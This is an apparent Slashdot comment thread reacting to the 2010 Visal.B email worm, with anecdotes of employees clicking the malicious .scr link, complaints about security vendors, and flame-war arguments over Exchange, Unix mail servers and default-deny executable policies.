And if Linux ever gains significant popularity, it will be some distribution (say Ubuntu) and not just the kernel. Windows is one OS - there are different versions of it, but the OS is one. Just like Ubuntu would be if it was more popular. No "average user" is going to use a different distribution than his friends, because then he would be unable to ask for advice (it's bad already with the way Vista changed things from XP; I don't use Vista or 7, so if somebody has a problem with it and asks me for help, if the way to fix things is different than on XP, he can figure it out himself because I won't install 7 just to answer his question; same with Linux - I have Debian, I won't install Ubuntu or Mandriva just to answer somebody's question; the problem is that there are more differences between Linux distron then there is between Windows versions).

Anyway, UAC in Vista/7 works like graphic sudo in Linux. If you want to do something that requires root access, you have to type in your password, but even if you run as Administrator, you get the prompt, but just need to click OK (if I manage to run KDE as root, I do not get such prompts at all).

We use Linux where I work, the choice was made primarily because of cost, I showed that Linux has a browser, software similar to MS Office and can create/open .doc and .xls files. I use Windows at home, though I have one virtual machine that runs a Debian server and two virtual machines with Debian on them to mess around when I need something so I don't break the server VM.

Never Mind That (Re:Got mimedefang?)

[EXTomar]

Never mind that because that isn't the problem. The real problem is blindly running anything from any application simply because it can read the bytes and map them into memory for execution. This would be the same thing as a web browser automatically assuming if you click on a url 'http://blackhatbadstuff.com/csrss.exe' the web browser should tell the OS load it into memory and run it.

Simply put email clients, web browsers, and any number of applications should be allowed to do that. More fundamentally, the operating system shouldn't provide facilities for user apps to do this under normal circumstances. Why do we put up with this? The proper fix seems to be removing this stuff from the OS so it doesn't happen but the world instead seems to believe that is better and just as cost effective buy more AV software and just tell people to reinstall when they break it.

Re:Never Mind That (Re:Got mimedefang?)

[surgen]

This would be the same thing as a web browser automatically assuming if you click on a url 'http://blackhatbadstuff.com/csrss.exe' the web browser should tell the OS load it into memory and run it.

Yes, its much better that the browser asks you to A) load it now or B) save it so you can load it again and again

Out employees made the day interesting!

[JakFrost]

So we have a few people in our company, 140 out of ~20K or 0.7%, to be exact who found the vague e-mail enticing enough to open.

Now, the outcome of this was more of a surprise to us than anything else. It cost us a bit of work here and there but nothing major. The multiple failures by our security products still have us a little puzzled. This was almost like the perfect storm of fail!

We have a web filtering gateway made by the #1 vendor in that industry that does a great job at classifying, blocking, and catching nefarious things but for some reason it did not catch and block the main .scr file nor the .iq payload files. We thought that by now the product and vendor would block .com, exe, scr, cpl, etc. or any directly executable file extension from being downloaded directly. Fail!

We are running the number #1 e-mail analysis and filtering plug-in set with heuristic detection = high on our #1 most popular corporate e-mail system but for some unknown reason the filter did not realize that all those people mass e-mailing the distribution lists in alphabetical order with the same e-mail that contains a fake link might be something out of the ordinary to block and filter. Fail!

We also have the #1 most popular anti-virus product with the latest signatures applied to all the workstation computers automatically but for some reason this quite popular variant of a previously known worm was not detected in signature based detection or heuristic detection even thought it starts downloading files from the internet, renaming them to exes, and then copies them all over the root drive, the operating system hierarchy, and all the local attached disks, while it is messing around with policy settings for the most popular e-mail client, enumerates and stops services, and tries to kill processes. Fail!

Overall we are still surprised at the outcome of all of this and the complete and utter surprise and lack of help from the vendors we use for our security products. Epic fail!

Seatbelts

[KingAlanI]

Obviously they're the safer option, but I find them more comfortable anyways, as they keep you from the small bouncing around that comes form normal vehicle motion. I like little harmonious convergences like that. :)

Bicycle helmets on the other hand...(whistles)

Another vote for a default deny policy

[Zorton]

Let's face it, 100% of the users on the internet are never going to learn to practice safe sex. So say you get an infection rate of 20%, that's still plenty of garbage floating around. It's time to start implementing a default deny policy on executables. Shriner and others have talked about this for years and windows 7 has the ability to lock down the OS to only binaries signed by allowed certificates. Implementation on unix like machines is already starting and it would be simple to start adding further hooks into the kernel to block unsigned binaries from even entering address space. This is not to say the signing mechanisms won't be attacked but we have to start moving forward. Virus and e-mail scanners will always be one step behind unless they figure out preemptive solutions that work and don't effect the end user. Once you start making the OS difficult to the user you've lost sight of the whole point and they'll happily click around you're pretty little warning boxes anyway.

The internet is no longer safe, use a condom.

Happened to my work too

[webheaded]

Guess I probably shouldn't mention where but it is a rather large company. I got an email from someone that was in another office in another city on the other side of the country that I'd never talked to before. Needless to say, I paused a moment before doing anything. Hovered over the link, lo and behold, it's linking to a .scr file on a different website. Interesting. I get 2 more and one goes to the majority of the people in our office, so I immediately send an email message saying "DO NOT CLICK THIS LINK." Regardless, at least 4 people in MY group end up clicking the link. Fuck's sake...what is wrong with people? Why would you click a link to an external site from someone you've never even talked to before? Seriously?

The really funny part was when one of the Team Leads walked over and asked if I knew what was going on. I was like "man, I can't believe anyone would click this...who would even do that?" at which point someone ran over and told us she'd clicked it and asked what to do. *sigh* I'm glad I'm not in our desktop department sometimes. I told her to call them and see what they wanted them to do and to go run over to all of our group to see who clicked it and quarantine that shit. I walked around later and saw notes on the computers of all the people that had clicked it saying not to touch that computer. Lol. They all had to move desks for the remainder of the day. Anyone that did this shouldn't be allowed internet access any more. :p

Re:User & Admin Retards

Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

I wonder why you got modded so high. Do you have any clues about email systems?

1) Support for 150,000 unique email addresses: There is no need to use unique in that sentence. Also support for what? Even my texteditor can hold that many email addresses (unlike notepad) and since it is unicode based there is no difficulty adding other countries usernames. So what the hell do you mean by support for 150k email addresses?

And why should it be a problem at all for any system? MTAs and MDAs are limited by the amount of traffic and not by user accounts. IMAP takes care of the mailbox access for the individual user. Every part of the system can be split over multiple server if you need more performance. The mail storage is database driven and scales depending on your choice of database. LDAP can store many more than 150k addresses.

2) What has the operating system to do with the programs running on it?
I can run the un'x flavour services as you call it on any system I like (Even windows). There is no real tie between os and services. They compile on every flavour of un*x and some mad people always take it and port it to windows, too.

3) Distribution lists?
I guess you mean mailing lists with restricted access. Maybe you should restrict the access harder. I can't see any reason for normal people to have access to lists like just because they are a member of the university for example.

Re:User & Admin Retards

- What retard still deploys Outlook/Exchange

Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

Novell GroupWise running on OES2 Linux?

Re:FLAMEBAIT article!!!!!!!!1one Windows is so sec

[FatLittleMonkey]

It must be so because I got modded flamebait last time I suggested Windows was more virus prone than alternatives. /rant

You might have been modded flamebait because your post reads as flamebait. Seriously, read it again with fresh eyes. The subj, and the first three lines/paragraphs. You sound exactly like any random shouty dickhead. Few people would bother reading down to the last paragraph of your post, which contains the only interesting, non-flamebait part; and is the only reason I bothered to reply.

Re:User & Admin Retards

I agree with all the comments except for the bit about "Which *nix is for taking care of such a big system --- To give you an example - Gmail is not hosted on Outlook/Exchange. The question was about Outlook/Exchange - Alternatives are available including Lotus Notes (I hate the UI, but the server is solid), don't have to invoke *nix on that one. I have personally hosted around 30000 mail boxes on Unix / AIX and smaller ones with Linux, so I dont see 150000 as a big number - Surely Slashdot is full of people who have done this on Linux?

Ashraya

MS Malware Protection Center info

[jamesl]

Worm:Win32/Visal.B is a new worm, written in Visual Basic, that is currently propagating in part using social-engineering. We strongly encourage customers to be cautious about clicking suspicious or even simply unexpected links in email, even if it's sent by someone you know. Getting infected by Visal.B is an example of what happens if you aren't careful.

http://blogs.technet.com/b/mmpc/archive/2010/09/09/emerging-malware-issue-visal-b.aspx

Details here:
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Search.aspx?query=Visal.B

And here:
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FVisal.B

Re:MS Malware Protection Center info

[aarner]

Only this "new" Visal.B uses the same payload and transmission vectors as Visal.A which was first spotted in the wild six weeks ago:

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FVisal.A

More than enough time for enterprisey-"security" vendors to get the blockware/websense/exchange server A/V up to date. At a minimum, firewall or websense block the 3 URLs Visal uses to transmit the payload.

XP Mode: $89.95 and no DirectX

[tepples]

If you're talking about virtualisation on Windows 7, it comes with a free license for XP

"Free"? The last time I checked, most PCs sold at big-box stores came with Windows 7 Home Premium, and the upgrade to Windows 7 Professional to unlock XP Mode costs $89.95 plus sales tax. Besides: No. XP Mode does not support 3D graphics APIs such as DirectX.

Re:User & Admin Retards

Typical MS drone...There are quite a few very decent "exchange alternatives". Take Zimbra for instance. Very simple to install and use at very large scales (tens of millions of users as in what Comcast deploys for Comcast.net). Problem is, all the MS Exchange Drones have no clue about how email systems work so they make stupid statements about there not being any good alternatives. Interesting thing is...in trials Exchange could not scale to support the number of users...not to mention the outrageously high amounts of money Microsoft wanted to "make it work"

Re:FLAMEBAIT article!!!!!!!!1one Windows is so sec

Woosh....

But... but... but...

I told my management that what they have in their inbox, basically, is a list of people to get the axe when the next round of layoffs comes around. Can't create a more accurate list of people who are truly the bottom of the barrel, and do not belong in an organization that's supposedly charged with with billions of investors' and depositors' money.

The problem with that logic is that such a list of people probably includes your management, whom you told this to. Recommending that a person gets the axe is not a very successful self-axe-avoiding technique when the target of your attack is who decides whether you're next.

Our office was hit by this yesterday.

First, I received the same virus email about three times.

Then I received an email from IT sent to the entire company about how vitally important it was not to click the link.

Then I received two or three more emails from IT correcting the initial warning emails.

But the best part was receiving the email from some poor sucker who had clicked Reply All to the spam email (copying nearly the entire company), said something to the effect of "Hey, your link isn't working... maybe you should try resending it?" and included a screenshot of the company firewall security message.

Best laugh I've had at the office in weeks.

Re:User & Admin Retards

150K email addresses in one country * 10 (I'm assuming the other 100 countries add up to the same volume as the US)? So only 1.5M email addresses? You think that's large?

I guess you would considering yours is so small.
BEHOLD!
8============O (3x larger than yours, AND I have the balls too)

Gret Detective Work!

However, that is only the name shown in the link. If you look at the atcual URL where the script is located it is in fact members.multimania.co.uk. So, don't throw bricks through any windows yet.

Re:User & Admin Retards

Umm...a German telco has a setup running a customised Debian/Squirrel instance that has over 13 million email accounts on it...

Re:User & Admin Retards

Have you got something better that can support 150,000 unique email addresses in the United States alone????

Um, every email system ever? 150k is no big thing.

Call us when your user count gets into the tens of millions.

Re:FLAMEBAIT article!!!!!!!!1one Windows is so sec

[Requiem18th]

Admittedly is not my best post but I get fed up from time to time.

Re:User & Admin Retards

You use what the company tells you to.

Let's follow that down the chain of command...hm...so it was the admins who mandated that? No? How about technical management? No? Oh, it was the clueless airbag at the executive level...

This wasn't an .exe file. It was a .scr file that was encapsulated in HTML to make it look like a .pdf. If you had HTML enabled, you'd only see a .pdf.

Jesus on a jumping pogo stick, you still have rendering issues due to Outlook borrowing the trident engine?!?? WTF?!?!

Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

Really? You expect me to believe a single Exchange box will handle those volumes adequately?!? Having run both setups, I can tell you there's a fat-factor of about 3x involved in getting Exchange to handle the same damn mail volume (i.e. you need 3x the hardware to get the same level of service). Come back when I can hear you over the sound of my insane laughter pointed in your direction...

Oh, and we still use a *nix box to protect the soft underbelly of our Exchange server...

- What retard still allows exe files to pass through e-mail?

See above.

Really? REALLY? I've been blocking this kind of crap since '01. Number of infections due to zero-day exploits: ZERO. Annual email volume processed: embarrassingly low, just 750,000 parcels / year for the last decade. That's only 7.5 million emails. A drop in the bucket.

- What retard still allows their users to run as root/admin?

See above.

You're kidding right? We FIRE people for doing that...

You're a scrawny worm, you 8 digit LUser id

See subject-line and look in a mirror, because you're nothing but a worm. A scrawny little 8 digit register luser id bearing worm at slashdot no less.

Simple solution

[schizz69]

Dont use MS Outlook. There are pleanty of alternatives out there, for instance Mozilla Thunderbird.

have you not heard of gmail?

i never get viruses, heck, i don't even see spam in my inbox lately.
this is only a problem of people who have mail services that are stupid.